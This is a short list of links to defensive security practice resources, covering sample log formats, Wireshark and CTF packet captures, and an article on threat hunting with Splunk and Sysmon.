LOGs

SAMPLE Logs

Good resource for sample log formats…

https://ossec-docs.readthedocs.io/en/latest/log_samples/

Sample pcaps from Wireshark for various protocols

https://wiki.wireshark.org/SampleCaptures

Public pcaps from CTF’s

https://www.netresec.com/?page=PcapFiles

SPLUNK with SysMon

Great resource for hunting advanced threats using sysmon…

https://medium.com/@haggis_m/splunking-the-endpoint-threat-hunting-with-sysmon-9dd956e3e1bd


REFERENCES

Photo by Tim Trad on Unsplash